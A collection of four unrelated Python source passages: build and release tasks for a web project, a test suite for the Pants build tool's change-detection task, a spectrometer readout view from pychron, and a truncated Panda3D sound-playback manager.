run('cp {path}/local-travis.py {path}/local.py'.format(path=path))
except IOError:
pass
@task
def copy_addon_settings():
for directory in os.listdir(settings.ADDON_PATH):
path = os.path.join(settings.ADDON_PATH, directory, 'settings')
if os.path.isdir(path) and not os.path.isfile(os.path.join(path, 'local.py')):
try:
open(os.path.join(path, 'local-dist.py'))
run('cp {path}/local-dist.py {path}/local.py'.format(path=path))
except IOError:
pass
@task
def copy_settings(addons=False):
# Website settings
if not os.path.isfile('website/settings/local.py'):
print('Creating local.py file')
run('cp website/settings/local-dist.py website/settings/local.py')
# Addon settings
if addons:
copy_addon_settings()
@task
def packages():
brew_commands = [
'update',
'upgrade',
'install libxml2',
'install libxslt',
'install elasticsearch',
'install gpg',
'install node',
'tap tokutek/tokumx',
'install tokumx-bin',
]
if platform.system() == 'Darwin':
print('Running brew commands')
for item in brew_commands:
command = 'brew {cmd}'.format(cmd=item)
run(command)
elif platform.system() == 'Linux':
# TODO: Write a script similar to brew bundle for Ubuntu
# e.g., run('sudo apt-get install [list of packages]')
pass
@task
def npm_bower():
print('Installing bower')
run('npm install -g bower', echo=True)
@task(aliases=['bower'])
def bower_install():
print('Installing bower-managed packages')
bower_bin = os.path.join(HERE, 'node_modules', 'bower', 'bin', 'bower')
run('{} prune'.format(bower_bin), echo=True)
run('{} install'.format(bower_bin), echo=True)
@task
def setup():
"""Creates local settings, installs requirements, and generates encryption key"""
copy_settings(addons=True)
packages()
requirements(addons=True, dev=True)
encryption()
from website.app import build_js_config_files
from website import settings
# Build nodeCategories.json before building assets
build_js_config_files(settings)
assets(dev=True, watch=False)
@task
def analytics():
from website.app import init_app
import matplotlib
matplotlib.use('Agg')
init_app()
from scripts.analytics import (
logs, addons, comments, folders, links, watch, email_invites,
permissions, profile, benchmarks
)
modules = (
logs, addons, comments, folders, links, watch, email_invites,
permissions, profile, benchmarks
)
for module in modules:
module.main()
@task
def clear_sessions(months=1, dry_run=False):
from website.app import init_app
init_app(routes=False, set_backends=True)
from scripts import clear_sessions
clear_sessions.clear_sessions_relative(months=months, dry_run=dry_run)
# Release tasks
@task
def hotfix(name, finish=False, push=False):
"""Rename hotfix branch to hotfix/<next-patch-version> and optionally
finish hotfix.
"""
print('Checking out master to calculate curent version')
run('git checkout master')
latest_version = latest_tag_info()['current_version']
print('Current version is: {}'.format(latest_version))
major, minor, patch = latest_version.split('.')
next_patch_version = '.'.join([major, minor, str(int(patch) + 1)])
print('Bumping to next patch version: {}'.format(next_patch_version))
print('Renaming branch...')
new_branch_name = 'hotfix/{}'.format(next_patch_version)
run('git checkout {}'.format(name), echo=True)
run('git branch -m {}'.format(new_branch_name), echo=True)
if finish:
run('git flow hotfix finish {}'.format(next_patch_version), echo=True, pty=True)
if push:
run('git push origin master', echo=True)
run('git push --tags', echo=True)
run('git push origin develop', echo=True)
@task
def feature(name, finish=False, push=False):
"""Rename the current branch to a feature branch and optionally finish it."""
print('Renaming branch...')
run('git branch -m feature/{}'.format(name), echo=True)
if finish:
run('git flow feature finish {}'.format(name), echo=True)
if push:
run('git push origin develop', echo=True)
# Adapted from bumpversion
def latest_tag_info():
try:
# git-describe doesn't update the git-index, so we do that
# subprocess.check_output(["git", "update-index", "--refresh"])
# get info about the latest tag in git
describe_out = subprocess.check_output([
"git",
"describe",
"--dirty",
"--tags",
"--long",
"--abbrev=40"
], stderr=subprocess.STDOUT
).decode().split("-")
except subprocess.CalledProcessError as err:
raise err
# logger.warn("Error when running git describe")
return {}
info = {}
if describe_out[-1].strip() == "dirty":
info["dirty"] = True
describe_out.pop()
info["commit_sha"] = describe_out.pop().lstrip("g")
info["distance_to_latest_tag"] = int(describe_out.pop())
info["current_version"] = describe_out.pop().lstrip("v")
# assert type(info["current_version"]) == str
assert 0 == len(describe_out)
return info
# Tasks for generating and bundling SSL certificates
# See http://cosdev.readthedocs.org/en/latest/osf/ops.html for details
@task
def generate_key(domain, bits=2048):
cmd = 'openssl genrsa -des3 -out {0}.key {1}'.format(domain, bits)
run(cmd)
@task
def generate_key_nopass(domain):
cmd = 'openssl rsa -in {domain}.key -out {domain}.key.nopass'.format(
domain=domain
)
run(cmd)
@task
def generate_csr(domain):
cmd = 'openssl req -new -key {domain}.key.nopass -out {domain}.csr'.format(
domain=domain
)
run(cmd)
@task
def request_ssl_cert(domain):
"""Generate a key, a key with password removed, and a signing request for
the specified domain.
Usage:
> invoke request_ssl_cert pizza.osf.io
"""
generate_key(domain)
generate_key_nopass(domain)
generate_csr(domain)
@task
def bundle_certs(domain, cert_path):
"""Concatenate certificates from NameCheap in the correct order. Certificate
files must be in the same directory.
"""
cert_files = [
'{0}.crt'.format(domain),
'COMODORSADomainValidationSecureServerCA.crt',
'COMODORSAAddTrustCA.crt',
'AddTrustExternalCARoot.crt',
]
certs = ' '.join(
os.path.join(cert_path, cert_file)
for cert_file in cert_files
)
cmd = 'cat {certs} > {domain}.bundle.crt'.format(
certs=certs,
domain=domain,
)
run(cmd)
@task
def clean_assets():
"""Remove built JS files."""
public_path = os.path.join(HERE, 'website', 'static', 'public')
js_path = os.path.join(public_path, 'js')
run('rm -rf {0}'.format(js_path), echo=True)
@task(aliases=['pack'])
def webpack(clean=False, watch=False, dev=False):
"""Build static assets with webpack."""
if clean:
clean_assets()
webpack_bin = os.path.join(HERE, 'node_modules', 'webpack', 'bin', 'webpack.js')
args = [webpack_bin]
if settings.DEBUG_MODE and dev:
args += ['--colors']
else:
args += ['--progress']
if watch:
args += ['--watch']
config_file = 'webpack.dev.config.js' if dev else 'webpack.prod.config.js'
args += ['--config {0}'.format(config_file)]
command = ' '.join(args)
run(command, echo=True)
@task()
def build_js_config_files():
from website import settings
from website.app import build_js_config_files as _build_js_config_files
print('Building JS config files...')
_build_js_config_files(settings)
print("...Done.")
@task()
def assets(dev=False, watch=False):
"""Install and build static assets."""
npm = 'npm install'
if not dev:
npm += ' --production'
run(npm, echo=True)
bower_install()
build_js_config_files()
# Always set clean=False to prevent possible mistakes
# on prod
webpack(clean=False, watch=watch, dev=dev)
@task
def generate_self_signed(domain):
"""Generate self-signed SSL key and certificate.
"""
cmd = (
'openssl req -x509 -nodes -days 365 -newkey rsa:2048'
' -keyout {0}.key -out {0}.crt'
).format(domain)
run(cmd)
@task
def update_citation_styles():
from scripts import parse_citation_styles
total = parse_citation_styles.main()
print("Parsed {} styles".format(total))
|
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.protobuf.java.java_protobuf_library import JavaProtobufLibrary
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.python.python_thrift_library import PythonThriftLibrary
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.jvm.targets.unpacked_jars import UnpackedJars
from pants.backend.python.targets.python_library import PythonLibrary
from pants.build_graph.address_lookup_error import AddressLookupError
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.remote_sources import RemoteSources
from pants.build_graph.resources import Resources
from pants.core_tasks.what_changed import WhatChanged
from pants.goal.workspace import Workspace
from pants.java.jar.jar_dependency import JarDependency
from pants.source.wrapped_globs import Globs, RGlobs
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseWhatChangedTest(ConsoleTaskTestBase):
@property
def alias_groups(self):
return BuildFileAliases(
# TODO: Use dummy target types here, instead of depending on other backends.
targets={
'java_library': JavaLibrary,
'python_library': PythonLibrary,
'jar_library': JarLibrary,
'unpacked_jars': UnpackedJars,
'resources': Resources,
'java_thrift_library': JavaThriftLibrary,
'java_protobuf_library': JavaProtobufLibrary,
'python_thrift_library': PythonThriftLibrary,
'remote_sources': RemoteSources,
},
context_aware_object_factories={
'globs': Globs,
'rglobs': RGlobs,
},
objects={
'jar': JarDependency,
'scala_jar': ScalaJarDependency,
}
)
@classmethod
def task_type(cls):
return WhatChanged
def assert_console_output(self, *output, **kwargs):
options = {'exclude_target_regexp': []}
if 'options' in kwargs:
options.update(kwargs['options'])
kwargs['options'] = options
super(BaseWhatChangedTest, self).assert_console_output(*output, **kwargs)
def workspace(self, files=None, parent=None, diffspec=None, diff_files=None):
class MockWorkspace(Workspace):
def touched_files(_, p):
self.assertEqual(parent or 'HEAD', p)
return files or []
def changes_in(_, ds):
self.assertEqual(diffspec, ds)
return diff_files or []
return MockWorkspace()
class WhatChangedTestBasic(BaseWhatChangedTest):
def test_nochanges(self):
self.assert_console_output(workspace=self.workspace())
def test_parent(self):
self.assert_console_output(options={'changes_since': '42'},
workspace=self.workspace(parent='42'))
def test_files(self):
self.assert_console_output(
'a/b/c',
'd',
'e/f',
options={'files': True},
workspace=self.workspace(files=['a/b/c', 'd', 'e/f'])
)
def setUp(self):
super(WhatChangedTestBasic, self).setUp()
self.add_to_build_file('root/src/py/a', dedent("""
python_library(
name='alpha',
sources=['b/c', 'd'],
resources=['test.resources']
)
jar_library(
name='beta',
jars=[
jar(org='gamma', name='ray', rev='1.137.bruce_banner')
]
)
"""))
self.add_to_build_file('root/src/py/1', dedent("""
python_library(
name='numeric',
sources=['2']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/a', dedent("""
python_library(
name='a',
sources=['a.py'],
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/b', dedent("""
python_library(
name='b',
sources=['b.py'],
dependencies=['root/src/py/dependency_tree/a']
)
"""))
self.add_to_build_file('root/src/py/dependency_tree/c', dedent("""
python_library(
name='c',
sources=['c.py'],
dependencies=['root/src/py/dependency_tree/b']
)
"""))
self.add_to_build_file('root/src/thrift', dedent("""
java_thrift_library(
name='thrift',
sources=['a.thrift']
)
python_thrift_library(
name='py-thrift',
sources=['a.thrift']
)
"""))
self.add_to_build_file('root/src/resources/a', dedent("""
resources(
name='a_resources',
sources=['a.resources']
)
"""))
self.add_to_build_file('root/src/java/a', dedent("""
java_library(
name='a_java',
sources=rglobs("*.java"),
)
"""))
self.add_to_build_file('root/src/java/b', dedent("""
java_library(
name='b_java',
sources=globs("*.java"),
)
"""))
self.add_to_build_file('root/3rdparty/BUILD.twitter', dedent("""
jar_library(
name='dummy',
jars=[
jar(org='foo', name='ray', rev='1.45')
])
"""))
self.add_to_build_file('root/3rdparty/BUILD', dedent("""
jar_library(
name='dummy1',
jars=[
jar(org='foo1', name='ray', rev='1.45')
])
"""))
# This is a directory that might confuse case insensitive file systems (on macs for example).
# It should not be treated as a BUILD file.
self.create_dir('root/scripts/a/build')
self.add_to_build_file('root/scripts/BUILD', dedent("""
java_library(
name='scripts',
sources=['a/build/scripts.java'],
)
"""))
self.add_to_build_file('BUILD.config', dedent("""
resources(
name='pants-config',
sources = globs('pants.ini*')
)
"""))
class WhatChangedTest(WhatChangedTestBasic):
def test_owned(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
)
def test_multiply_owned(self):
self.assert_console_output(
'root/src/thrift:thrift',
'root/src/thrift:py-thrift',
workspace=self.workspace(files=['root/src/thrift/a.thrift'])
)
def test_build(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/a:beta',
workspace=self.workspace(files=['root/src/py/a/BUILD'])
)
def test_broken_build_file(self):
with self.assertRaises(AddressLookupError):
self.add_to_build_file('root/src/py/a', dedent("""
//
"""))
self.assert_console_output(workspace=self.workspace(files=['root/src/py/a/BUILD']))
def test_resource_changed(self):
self.assert_console_output(
'root/src/py/a:alpha',
workspace=self.workspace(files=['root/src/py/a/test.resources'])
)
def test_resource_changed_for_java_lib(self):
self.assert_console_output(
'root/src/resources/a:a_resources',
workspace=self.workspace(files=['root/src/resources/a/a.resources'])
)
def test_build_sibling(self):
self.assert_console_output(
'root/3rdparty:dummy',
workspace=self.workspace(files=['root/3rdparty/BUILD.twitter'])
)
def test_resource_type_error(self):
self.add_to_build_file('root/src/resources/a1', dedent("""
java_library(
name='a1',
sources=['a1.test'],
resources=[1]
)
"""))
self.assert_console_raises(
Exception,
workspace=self.workspace(files=['root/src/resources/a1/a1.test'])
)
def test_build_directory(self):
# This should ensure that a directory named the same as build files does not cause an exception.
self.assert_console_output(
'root/scripts:scripts',
workspace=self.workspace(files=['root/scripts/a/build', 'root/scripts/a/build/scripts.java'])
)
def test_fast(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'fast': True},
workspace=self.workspace(
files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec(self):
self.assert_console_output(
'root/src/py/a:alpha',
'root/src/py/1:numeric',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'],
),
)
def test_diffspec_removed_files(self):
self.assert_console_output(
'root/src/java/a:a_java',
options={'diffspec': '42'},
workspace=self.workspace(
diffspec='42',
diff_files=['root/src/java/a/b/c/Foo.java'],
),
)
def test_include_dependees(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
options={'include_dependees': 'direct'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_exclude(self):
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/b:b',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive'},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
self.assert_console_output(
'root/src/py/dependency_tree/a:a',
'root/src/py/dependency_tree/c:c',
options={'include_dependees': 'transitive', 'exclude_target_regexp': [':b']},
workspace=self.workspace(files=['root/src/py/dependency_tree/a/a.py'])
)
def test_deferred_sources_new(self):
self.add_to_build_file('root/proto', dedent("""
remote_sources(name='unpacked_jars',
dest=java_protobuf_library,
sources_target=':external-source',
)
unpacked_jars(name='external-source',
libraries=[':external-source-jars'],
include_patterns=[
'com/squareup/testing/**/*.proto',
],
)
jar_library(name='external-source-jars',
jars=[
jar(org='com.squareup.testing.protolib', name='protolib-external-test', rev='0.0.2'),
],
)
"""))
self.assert_console_output(
'root/proto:unpacked_jars',
'root/proto:external-source',
'root/proto:external-source-jars',
workspace=self.workspace(files=['root/proto/BUILD'])
)
def test_rglobs_in_sources(self):
self.assert_console_output(
'root/src/java/a:a_java',
workspace=self.workspace(files=['root/src/java/a/foo.java'])
)
self.assert_console_output(
'root/src/java/a:a_java',
workspace=self.workspace(files=['root/src/java/a/b/foo.java'])
)
def test_globs_in_sources(self):
self.assert_console_output(
'root/src/java/b:b_java',
workspace=self.workspace(files=['root/src/java/b/foo.java'])
)
self.assert_console_output(
workspace=self.workspace(files=['root/src/java/b/b/foo.java'])
)
def test_globs_in_resources(self):
self.add_to_build_file('root/resources', dedent("""
resources(
name='resources',
sources=globs('*')
)
"""))
self.assert_console_output(
workspace=self.workspace(files=['root/resources/foo/bar/baz.yml'])
)
self.assert_console_output(
'root/resources:resources',
workspace=self.workspace(files=['root/resources/baz.yml'])
)
def test_root_config(self):
self.assert_console_output(
'//:pants-config',
workspace=self.workspace(files=['pants.ini'])
)
class WhatChangedTestWithIgnorePatterns(WhatChangedTestBasic):
@property
def build_ignore_patterns(self):
return ['root/src/py/1']
def test_build_ignore_patterns(self):
self.assert_console_output(
'root/src/py/a:alpha',
workspace=self.workspace(files=['root/src/py/a/b/c', 'root/src/py/a/d', 'root/src/py/1/2'])
)
|
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
# ============= standard library imports ========================
import time
import six.moves.configparser
# ============= enthought library imports =======================
from pyface.timer.do_later import do_after
from six.moves import zip
from traits.api import (
HasTraits,
Str,
List,
Any,
Event,
Button,
Int,
Bool,
Float,
Either,
)
from traitsui.api import UItem, VGroup, Item, HGroup, View, TableEditor, Tabbed
from traitsui.api import spring
from traitsui.handler import Handler
from traitsui.table_column import ObjectColumn
# ============= local library imports ==========================
from pychron.core.yaml import yload
from pychron.paths import paths
from pychron.persistence_loggable import PersistenceLoggable
from pychron.pychron_constants import NULL_STR
DEFAULT_CONFIG = """-
- name: HighVoltage
min: 0
max: 5
compare: False
- name: ElectronEnergy
min: 53
max: 153
compare: False
- name: YSymmetry
min: -100
max: 100
compare: True
- name: ZSymmetry
min: -100
max: 100
compare: True
- name: ZFocus
min: 0
max: 100
compare: True
- name: IonRepeller
min: -22.5
max: 53.4
compare: True
- name: ExtractionLens
min: 0
max: 100
compare: True
-
- name: H2
compare: True
- name: H1
compare: True
- name: AX
compare: True
- name: L1
compare: True
- name: L2
compare: True
- name: CDD
compare: True
"""
class BaseReadout(HasTraits):
name = Str
id = Str
value = Either(Str, Float)
spectrometer = Any
compare = Bool(True)
config_value = Float
tolerance = Float
percent_tol = Float
display_tolerance = Str
# use_word = Bool(True)
@property
def dev(self):
try:
return self.value - self.config_value
except ValueError:
return NULL_STR
@property
def percent_dev(self):
try:
return abs(self.dev / self.config_value * 100)
except ZeroDivisionError:
return NULL_STR
def set_value(self, v):
try:
self.value = float(v)
except (AttributeError, ValueError, TypeError):
if v is not None:
self.value = v
def config_compare(self):
tolerance = self.percent_tol
if tolerance:
try:
self.display_tolerance = "{:0.2f}%".format(tolerance * 100)
try:
if (
abs(self.value - self.config_value) / self.config_value
> tolerance
):
return self.name, self.value, self.config_value
except TypeError:
pass
except ZeroDivisionError:
pass
else:
try:
self.display_tolerance = "{:0.2f}".format(self.tolerance)
if abs(self.value - self.config_value) > self.tolerance:
return self.name, self.value, self.config_value
except TypeError:
pass
def compare_message(self):
return "{} does not match. Current:{:0.3f}, Config: {:0.3f}, tol.: {}".format(
self.name, self.value, self.config_value, self.display_tolerance
)
class Readout(BaseReadout):
min_value = Float(0)
max_value = Float(100)
tolerance = Float(0.01)
query_timeout = 3
_last_query = 0
def traits_view(self):
v = View(HGroup(Item("value", style="readonly", label=self.name)))
return v
def query_value(self):
if self.query_needed and self.compare:
parameter = self.spectrometer.get_hardware_name(self.id)
if parameter:
v = self.spectrometer.get_parameter(parameter)
self.set_value(v)
self._last_query = time.time()
def get_percent_value(self):
try:
return (self.value - self.min_value) / (self.max_value - self.min_value)
except (TypeError, ZeroDivisionError, ValueError):
return 0
@property
def query_needed(self):
return (
not self._last_query
or (time.time() - self._last_query) > self.query_timeout
)
class DeflectionReadout(BaseReadout):
pass
class ReadoutHandler(Handler):
def closed(self, info, is_ok):
info.object.stop()
class ReadoutView(PersistenceLoggable):
readouts = List(Readout)
deflections = List(DeflectionReadout)
spectrometer = Any
refresh = Button
refresh_needed = Event
refresh_period = Int(10, enter_set=True, auto_set=False) # seconds
compare_to_config_enabled = Bool(True)
_alive = False
pattributes = ("compare_to_config_enabled", "refresh_period")
persistence_name = "readout"
def __init__(self, *args, **kw):
super(ReadoutView, self).__init__(*args, **kw)
# peristence_mixin load
self.load()
self._load_configuration()
def _load_configuration(self):
ypath = os.path.join(paths.spectrometer_dir, "readout.yaml")
if not os.path.isfile(ypath):
path = os.path.join(paths.spectrometer_dir, "readout.cfg")
if os.path.isfile(path):
self._load_cfg(path)
else:
if self.confirmation_dialog(
"no readout configuration file. \n"
"Would you like to write a default file at {}".format(ypath)
):
self._write_default(ypath)
self._load_yaml(ypath)
else:
self._load_yaml(ypath)
def _load_cfg(self, path):
self.warning_dialog(
"Using readout.cfg is deprecated. Please consider migrating to readout.yaml"
)
config = six.moves.configparser.ConfigParser()
config.read(path)
for section in config.sections():
rd = Readout(name=section, spectrometer=self.spectrometer)
self.readouts.append(rd)
def _load_yaml(self, path):
yt = yload(path)
if yt:
try:
yl, yd = yt
except ValueError:
yl = yt
yd = []
for rd in yl:
rr = Readout(
spectrometer=self.spectrometer,
name=rd["name"],
id=rd.get("id", rd["name"]),
hardware_name=rd.get("hardware_name"),
min_value=rd.get("min", 0),
max_value=rd.get("max", 1),
tolerance=rd.get("tolerance", 0.01),
percent_tol=rd.get("percent_tolerance", 0.0),
compare=rd.get("compare", True),
query_timeout=self.refresh_period,
)
self.readouts.append(rr)
for rd in yd:
rr = DeflectionReadout(
spectrometer=self.spectrometer,
name=rd["name"],
id=rd.get("id", rd["name"]),
tolerance=rd.get("tolerance", 1),
compare=rd.get("compare", True),
)
self.deflections.append(rr)
def _write_default(self, ypath):
with open(ypath, "w") as wfile:
wfile.write(DEFAULT_CONFIG)
@property
def ms_period(self):
return self.refresh_period * 1000
def start(self):
if not self._alive:
self._alive = True
self._refresh_loop()
def stop(self):
self._alive = False
def _refresh_loop(self):
self._refresh()
if self._alive:
do_after(self.ms_period, self._refresh_loop)
def _refresh_fired(self):
self._refresh()
def _refresh_period_changed(self):
for r in self.readouts:
r.query_timeout = self.refresh_period
def _refresh(self):
spec = self.spectrometer
deflections = [r for r in self.deflections if r.compare]
keys = [r.name for r in deflections]
if keys:
ds = spec.read_deflection_word(keys)
for d, r in zip(ds, deflections):
r.set_value(d)
st = time.time()
timeout = self.refresh_period * 0.95
for rd in self.readouts:
if time.time() - st > timeout:
break
rd.query_value()
self.refresh_needed = True
# compare to configuration values
ne = []
nd = []
if not spec.simulation and self.compare_to_config_enabled:
for nn, rs in ((ne, self.readouts), (nd, self.deflections)):
for r in rs:
cv = spec.get_configuration_value(r.id)
r.config_value = cv
if r.compare:
args = r.config_compare()
if args:
nn.append(args)
self.debug(r.compare_message())
else:
r.set_value(NULL_STR)
ns = ""
if ne:
ns = "\n".join(["{:<16s}\t{:0.3f}\t{:0.3f}".format(*n) for n in ne])
if nd:
nnn = "\n".join(["{:<16s}\t\t{:0.0f}\t{:0.0f}".format(*n) for n in nd])
ns = "{}\n{}".format(ns, nnn)
if ns:
msg = (
"There is a mismatch between the current spectrometer values and the configuration.\n"
"Would you like to set the spectrometer to the configuration values?\n\n"
"Name\t\tCurrent\tConfig\n{}".format(ns)
)
if self.confirmation_dialog(msg, size=(725, 300)):
spec.send_configuration()
spec.set_debug_configuration_values()
def traits_view(self):
def ff(x):
return "{:0.3f}".format(x) if isinstance(x, float) else x
cols = [
ObjectColumn(name="name", label="Name"),
ObjectColumn(name="value", format_func=ff, label="Value", width=50),
ObjectColumn(
name="config_value", format="%0.3f", label="Config. Value", width=50
),
ObjectColumn(name="dev", format_func=ff, label="Dev.", width=50),
ObjectColumn(name="percent_dev", format_func=ff, label="%Dev.", width=50),
ObjectColumn(name="display_tolerance", label="Tol."),
]
dcols = [
ObjectColumn(name="name", label="Name", width=100),
ObjectColumn(name="value", format_func=ff, label="Value", width=100),
ObjectColumn(name="dev", format_func=ff, label="Dev."),
ObjectColumn(name="percent_dev", format_func=ff, label="%Dev."),
ObjectColumn(name="display_tolerance", label="Tol."),
]
b = VGroup(
UItem("readouts", editor=TableEditor(columns=cols, editable=False)),
label="General",
)
c = VGroup(
UItem(
"deflections",
editor=TableEditor(columns=dcols, sortable=False, editable=False),
),
label="Deflections",
)
v = View(
VGroup(
Tabbed(b, c),
HGroup(
Item(
"compare_to_config_enabled",
label="Comp. Config",
tooltip="If checked, compare the current values to the values in the "
"configuration file. "
"Warn user if there is a mismatch",
),
spring,
Item("refresh", show_label=False),
),
)
)
return v
def new_readout_view(rv):
rv.start()
from pychron.processing.analyses.view.magnitude_editor import MagnitudeColumn
cols = [
ObjectColumn(name="name", label="Name"),
ObjectColumn(
name="value",
format_func=lambda x: "{:0.3f}".format(x) if isinstance(x, float) else x,
label="Value",
),
MagnitudeColumn(name="value", label="", width=200),
]
dcols = [
ObjectColumn(name="name", label="Name", width=100),
ObjectColumn(name="value", label="Value", width=100),
]
a = HGroup(Item("refresh_period", label="Period (s)"))
b = VGroup(
UItem("readouts", editor=TableEditor(columns=cols, editable=False)),
label="General",
)
c = VGroup(
UItem(
"deflections",
editor=TableEditor(columns=dcols, sortable=False, editable=False),
),
label="Deflections",
)
v = View(
VGroup(a, Tabbed(b, c)),
handler=ReadoutHandler(),
title="Spectrometer Readout",
width=500,
resizable=True,
)
return v
# ============= EOF =============================================
|
|
'''
Copyright (c) 2008 Georgios Giannoudovardis, <vardis.g@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import logging
import math
from direct.showbase import Audio3DManager
from pandac.PandaModules import NodePath
from pano.constants import PanoConstants
from pano.util import PandaUtil
from pano.model.Sound import Sound
from pano.audio.SoundPlaybackInterface import SoundPlaybackInterface
class SoundsPlayer():
"""
Manages playback and the lifetime of sounds.
Generally you can provide either filenames of .snd files or raw music files
such as .mp3, .ogg. Use the high level .snd files if you want to provide
further information such as 3d position, subtitles, etc.
For efficiency reasons, there is a limit to the number of concurrent active
sounds and thus it is important to release sound resources when they are
no longer needed. But since garbage collection is not deterministic, you
must call sound.dispose() when you have no more need of the sound object.
"""
def __init__(self, game):
self.log = logging.getLogger('pano.soundsPlayer')
self.game = game
self.audio3d = None # manager of positional sounds
self.sounds = [] # list of references to sound objects
self.unfinishedSounds = [] # list of strong references to sounds still playing
self.volume = 1.0 # default volume level
self.rate = 1.0 # default rate of playback
self.balance = 0.0 # default balance, -1.0: left, 0.0: center, 1.0: right
self.enabled = True # indicates if sounds are enabled in a global scale
# the following are valid only for positional sounds
self.dropOffFactor = 1.0 # the rate that sounds attenuate by distance
self.distanceFactor = 1.0 # the scale of measuring units, the default is a scale of 1.0 to match units with meters
self.dopplerFactor = 1.0 # the Doppler factor
def initialize(self):
self.audio3d = Audio3DManager.Audio3DManager(base.sfxManagerList[0], self.game.getView().getCamera())
def update(self, millis):
# drop finished sounds
prevLen = len(self.sounds)
self.sounds = [snd for snd in self.sounds if not snd.isFinished()]
rem = prevLen - len(self.sounds)
if rem > 0:
self.log.debug('Removed %d finished sounds' % rem)
positionalSounds = [snd for snd in self.sounds if snd.positional != Sound.POS_None]
for sp in positionalSounds:
if sp.positional == Sound.POS_Hotspot:
hp = self.game.getView().activeNode.hotspots.get(sp.node)
if hp is not None:
hpos = self.game.getView().panoRenderer.getHotspotWorldPos(hp)
np = NodePath('audio3d_' + sp.name)
np.setPos(hpos[0], hpos[1], hpos[2])
self.audio3d.attachSoundToObject(sp, np)
else:
self.log.error('Could not find hotspot %s to attach positional sound %s' % (sp.node, sp.name))
elif snd.positionalType == Sound.POS_Node:
np = PandaUtil.findSceneNode(sp.node)
if np is not None:
self.audio3d.attachSoundToObject(sp.pandaSound, np)
else:
self.log.error('Could not find node %s to attach positional sound %s' % (snd.pos, snd.name))
if self.audio3d is not None:
self.audio3d.setDropOffFactor(self.dropOffFactor)
self.audio3d.setDistanceFactor(self.distanceFactor)
self.audio3d.setDopplerFactor(self.dopplerFactor)
def playSound(self, sndName, loop=None, rate=None):
"""
Plays the sound that is described by the specified sound resource
whose properties are defined in the file sndName + '.snd'.
Returns: a Sound object or None if playback failed
"""
if self.enabled:
snd = self.game.getResources().loadSound(sndName)
loopVal = loop if loop is not None else snd.loop
rateVal = rate if rate is not None else snd.playRate
if rateVal is None:
rateVal = self.rate
is3D = snd.positional != Sound.POS_None
spi = self.playSoundFile(snd.soundFile, loopVal, rateVal, is3D)
spi.configureFilters(snd.getActiveFilters())
# 3d sounds with an absolute position can be specified here just once
# for other positional types we specify them in the update method
if is3D and snd.positional == Sound.POS_Absolute:
np = NodePath('audio3d_' + snd.name)
np.setPos(snd.node[0], snd.node[1], snd.node[2])
self.audio3d.attachSoundToObject(snd, np)
return spi
def playSoundFile(self, filename, loop=False, rate=1.0, is3D = False):
"""
Plays the specified sound file with the defaul settings.
Returns: a Sound object or None if playback failed
"""
if self.enabled:
fp = self.game.getResources().getResourceFullPath(PanoConstants.RES_TYPE_SFX, filename)
try:
if is3D:
sound = self.audio3d.loadSfx(fp)
else:
sound = loader.loadSfx(fp)
except Exception:
self.log.exception('An error occured while attempting to load sound %s' % filename)
return None
spi = SoundPlaybackInterface(sound, is3D)
spi.setLoop(loop)
spi.setPlayRate(rate)
spi.setVolume(self.volume)
